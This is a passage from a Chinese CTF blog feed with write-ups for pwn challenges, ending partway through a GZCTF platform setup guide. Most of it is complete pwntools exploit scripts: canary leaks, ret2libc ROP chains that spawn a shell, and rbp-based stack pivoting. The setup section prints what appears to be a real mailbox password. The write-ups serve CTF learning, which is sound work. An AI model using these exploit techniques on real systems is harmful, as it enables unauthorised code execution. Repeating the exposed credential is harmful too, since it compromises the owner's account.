the size :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">100</span>))<br>ru(<span class="hljs-string">"Enter the number of tries :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br>ru(<span class="hljs-string">"Enter your guess :"</span>)<br><span class="hljs-comment">#num=libc.rand()</span><br><span class="hljs-comment">#sl(str(num))</span><br><br>sl(<span class="hljs-string">b'-'</span>)<br><span class="hljs-comment">#pause()</span><br>ru(<span class="hljs-string">b'You entered '</span>)<br>base = <span class="hljs-built_in">int</span>(ru(<span class="hljs-string">b' '</span>)[:-<span class="hljs-number">1</span>]) - <span class="hljs-number">0x1579</span><br>lg(<span class="hljs-string">"base:"</span>+<span class="hljs-built_in">hex</span>(base))<br>pop_rdi=base+<span class="hljs-number">0x0000000000001793</span><br>ret=base+<span class="hljs-number">0x000000000000101a</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]+base<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]+base<br>back=base+<span class="hljs-number">0x000000000001436</span><br></code></pre></td></tr></table></figure><h2 id="偏移计算"><a href="#偏移计算" class="headerlink" title="偏移计算"></a>偏移计算</h2><p>这里得注意需要提前打断点,这里可以看到输入点在libc段上,然后使用tls和canary指令确定canary的位置</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251950871.png" alt="Untitled"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251952928.png" alt="image-20230925195234111"></p><p>这里可以确定偏移为0x858,然后构造下面的payload来覆盖canary以及泄露libc基址,再返回到start_routine函数,并且最后的时候有个栈对其的问题,多加几个ret就可以解决了</p><p>完整exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./guess"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=cdll.LoadLibrary("/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-comment">#num=libc.time(0)</span><br><span class="hljs-comment">#libc.srand(num)</span><br><br>ru(<span class="hljs-string">"Enter the size :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">100</span>))<br>ru(<span class="hljs-string">"Enter the number of tries :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br>ru(<span class="hljs-string">"Enter your guess :"</span>)<br><span class="hljs-comment">#num=libc.rand()</span><br><span class="hljs-comment">#sl(str(num))</span><br><br><span class="hljs-comment">#gdb.attach(io,'b *$rebase(0x0000000000001458)')</span><br><span class="hljs-comment">#pause()</span><br>sl(<span class="hljs-string">b'-'</span>)<br><span class="hljs-comment">#pause()</span><br>ru(<span class="hljs-string">b'You entered '</span>)<br>base = <span class="hljs-built_in">int</span>(ru(<span class="hljs-string">b' '</span>)[:-<span class="hljs-number">1</span>]) - <span class="hljs-number">0x1579</span><br>lg(<span class="hljs-string">"base:"</span>+<span class="hljs-built_in">hex</span>(base))<br>pop_rdi=base+<span class="hljs-number">0x0000000000001793</span><br>ret=base+<span class="hljs-number">0x000000000000101a</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]+base<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]+base<br>back=base+<span class="hljs-number">0x000000000001436</span><br><br>ru(<span class="hljs-string">"> \n"</span>)<br><span class="hljs-comment">#payload=b'A'*0x18+p64(0xdeadbeef)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back)</span><br><span class="hljs-comment">#payload=payload.ljust(0x858,b'\x00')+p64(0xdeadbeef)</span><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">8</span><br><span class="hljs-comment">#pause()</span><br>sl(payload)<br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><br>ru(<span class="hljs-string">"> \n"</span>)<br><span class="hljs-comment">#pause()</span><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(<span class="hljs-number">0xdeadbeef</span>)+p64(<span class="hljs-number">0</span>)+p64(ret)*<span class="hljs-number">0x23</span>+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>io.sendline(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="pwn-timemaster"><a href="#pwn-timemaster" class="headerlink" title="pwn_timemaster"></a>pwn_timemaster</h1><p>控制好 alloca 函数申请的栈空间,利⽤ - 泄露 canary,然后利用ask_again函数的栈溢出漏洞打ret2libc</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">double_to_hex</span>(<span class="hljs-params">f</span>):<br> <span class="hljs-keyword">return</span> struct.unpack(<span class="hljs-string">'<Q'</span>, struct.pack(<span class="hljs-string">'<d'</span>, <span class="hljs-built_in">float</span>(f)))[<span class="hljs-number">0</span>]<br><br>ru(<span class="hljs-string">"What is your name?\n>"</span>)<br>payload=<span class="hljs-string">b'/bin/sh'</span><br>sl(payload)<br><br>ru(<span class="hljs-string">"How many times do you want to try?\n>"</span>)<br>gdb.attach(io,<span class="hljs-string">'b *0x0000000000400956'</span>)<br>pause()<br><span class="hljs-comment">#dbg()</span><br>sl(<span class="hljs-string">b'14'</span>)<br>pause()<br><br>ru(<span class="hljs-string">"Time[sec]:"</span>)<br>sl(<span class="hljs-string">b'-'</span>)<br><br>s(<span class="hljs-string">b'\n'</span>)<br>s(<span class="hljs-string">b'\n'</span>)<br>ru(<span class="hljs-string">b'Stop the timer as close to '</span>)<br>text = ru(<span class="hljs-string">b' '</span>)<br>canary = double_to_hex(text)<br>lg(<span class="hljs-string">"canary:"</span>+<span class="hljs-built_in">hex</span>(canary))<br><br>pop_rdi=<span class="hljs-number">0x0000000000400e93</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x00000000004006a6</span><br><br>ru(<span class="hljs-string">b' (Y/n) '</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(canary)+<span class="hljs-string">b'A'</span>*<span class="hljs-number">8</span>+p64(pop_rdi)+p64(<span class="hljs-number">0x601ff0</span>)+p64(puts_plt)+p64(elf.sym[<span class="hljs-string">'ask_again'</span>])<br>sl(payload)<br>libcbase=uu64()-<span class="hljs-number">0x23fc0</span><br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(canary)+p64(<span class="hljs-number">0</span>)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>栈迁移_改rbp打法</title>
<link href="/2023/09/25/%E6%A0%88%E8%BF%81%E7%A7%BB-%E6%94%B9rbp%E6%89%93%E6%B3%95/"/>
<url>/2023/09/25/%E6%A0%88%E8%BF%81%E7%A7%BB-%E6%94%B9rbp%E6%89%93%E6%B3%95/</url>
<content type="html"><![CDATA[<h1 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h1><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251935879.png" alt="Untitled"></p><p>buf有一个0x10字节的溢出,只可以控制rbp和返回地址,然后可以往程序的bss段上写一个内容(这个bss的输入在控制rbp的打法上其实并不需要)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python">bss=elf.bss(<span class="hljs-number">0x800</span>)<br>pop_rdi=<span class="hljs-number">0x00000000004013d3</span><br>leave=<span class="hljs-number">0x000000000040136e</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x000000000040101a</span><br>ptr_addr = <span class="hljs-number">0x401316</span><br>pop_rbp=<span class="hljs-number">0x00000000004011bd</span><br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0xf0</span>+p64(bss+<span class="hljs-number">0xf0</span>)+p64(ptr_addr)<br>s(payload)<br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp)+p64(elf.bss(<span class="hljs-number">0xbf8</span>))+p64(ptr_addr)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(bss-<span class="hljs-number">0x8</span>)+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br></code></pre></td></tr></table></figure><p>这里利用的是程序本身的一个read的输入</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251932904.png"></p><p>这里的一个read的输入是通过rbp的值的一个索引,输入向rbp-0xf0的位置,所以上面的exp将rbp修改为bss+0xf0最后会输入到bss的位置处,调用完read后在bss段上部署rop链,泄露libc。并且将rbp修改为bss+0xbf8,然后接着调用read</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(elf.bss(<span class="hljs-number">0xb00</span>))+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure><p>接着在0xb00处构造system(”/bin/sh”)的rop链</p><p>完整exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> operator <span class="hljs-keyword">import</span> le<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><br>banary = <span class="hljs-string">"./login"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'175.20.7.11'</span><br>port = <span class="hljs-number">9999</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>bss=elf.bss(<span class="hljs-number">0x800</span>)<br>pop_rdi=<span class="hljs-number">0x00000000004013d3</span><br>leave=<span class="hljs-number">0x000000000040136e</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x000000000040101a</span><br>ptr_addr = <span class="hljs-number">0x401316</span><br>pop_rbp=<span class="hljs-number">0x00000000004011bd</span><br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0xf0</span>+p64(bss+<span class="hljs-number">0xf0</span>)+p64(ptr_addr)<br>s(payload)<br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp)+p64(elf.bss(<span class="hljs-number">0xbf8</span>))+p64(ptr_addr)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(bss-<span class="hljs-number">0x8</span>)+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><br>payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(elf.bss(<span class="hljs-number">0xb00</span>))+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>GZ靶场搭建</title>
<link href="/2023/09/25/GZ%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA/"/>
<url>/2023/09/25/GZ%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA/</url>
<content type="html"><![CDATA[<h1 id="GZ靶场搭建以及pwn题部署"><a href="#GZ靶场搭建以及pwn题部署" class="headerlink" title="GZ靶场搭建以及pwn题部署"></a>GZ靶场搭建以及pwn题部署</h1><p>成果图展示</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331957.png" alt="Untitled"></p><h1 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h1><p>使用的是阿里云的ubuntu20.04服务器搭建的,首先得自己安装docker和docker-compose(使用他市场里面那个自带docker的ubuntu20.04貌似会有点问题,最后还是自己安装docker方便点)</p><p>新建两个文件,位于同一个文件夹。这里的文件夹名称为GZCTF,文件为appsettings.json和docker-compose.yml。</p><p>appsettings.json文件内写入:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs awk">{<br> <span class="hljs-string">"AllowedHosts"</span>: <span class="hljs-string">"*"</span>,<br> <span class="hljs-string">"ConnectionStrings"</span>: {<br> <span class="hljs-string">"Database"</span>: <span class="hljs-string">"Host=db:5432;Database=gzctf;Username=postgres;Password=<String1>"</span><br> <span class="hljs-regexp">//</span><String1>换成数据库密码,随机密码且长度足够<br> },<br> <span class="hljs-string">"Logging"</span>: {<br> <span class="hljs-string">"LogLevel"</span>: {<br> <span class="hljs-string">"Default"</span>: <span class="hljs-string">"Information"</span>,<br> <span class="hljs-string">"Microsoft"</span>: <span class="hljs-string">"Warning"</span>,<br> <span class="hljs-string">"Microsoft.Hosting.Lifetime"</span>: <span class="hljs-string">"Information"</span><br> }<br> },<br> <span class="hljs-regexp">//</span>邮箱配置<br> <span class="hljs-string">"EmailConfig"</span>: {<br> <span class="hljs-string">"SendMailAddress"</span>: <span class="hljs-string">"[email protected]"</span>, <span class="hljs-regexp">//</span> 填入邮箱<br> <span class="hljs-string">"UserName"</span>: <span class="hljs-string">"ctf_noreply"</span>, <span class="hljs-regexp">//</span> 发件人名称<br> <span class="hljs-string">"Password"</span>: <span class="hljs-string">"UWPTINWMFPQVMPAH"</span>, <span 